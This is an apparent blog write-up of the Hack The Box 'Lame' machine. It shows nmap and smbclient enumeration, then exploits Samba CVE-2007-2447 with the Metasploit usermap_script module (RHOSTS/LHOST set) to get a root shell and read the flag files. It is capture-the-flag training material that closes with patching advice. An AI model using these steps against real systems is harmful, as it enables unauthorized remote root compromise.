Skip to content

HackTheBox: Lame — Initial Access via Samba CVE-2007-2447

Platform: Hack The Box  |  Difficulty: Easy  |  OS: Linux Overview Lame is one of the first machines on HTB. It’s a great introduction to exploiting CVEs against real-world services.…

Platform: Hack The Box  |  Difficulty: Easy  |  OS: Linux

Overview

Lame is one of the first machines on HTB. It’s a great introduction to exploiting CVEs against real-world services. The target runs a vulnerable version of Samba (3.0.20) that allows unauthenticated remote code execution via the username field in the logon request.

Enumeration

Starting with a full port scan:

nmap -sV -sC -p- 10.10.10.3 --min-rate 5000

Key open ports: 21/tcp (vsftpd 2.3.4), 22/tcp (OpenSSH), 139/tcp & 445/tcp (Samba).

Checking Samba version:

smbclient -L //10.10.10.3 --no-pass

Exploitation — CVE-2007-2447

Samba 3.0.20 < 3.0.25rc3 is vulnerable to command injection via the username field when using non-default "username map script" config. Directly exploitable with Metasploit:

use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
set LHOST YOUR_IP
run

This drops us into a root shell without privilege escalation — the service runs as root.

Post-Exploitation

cat /root/root.txt
cat /home/makis/user.txt

Key Takeaways

  • Always check service versions against CVE databases during enumeration
  • Legacy Samba versions remain a critical attack surface in many environments
  • Network segmentation and timely patching mitigate this entirely
Hire Me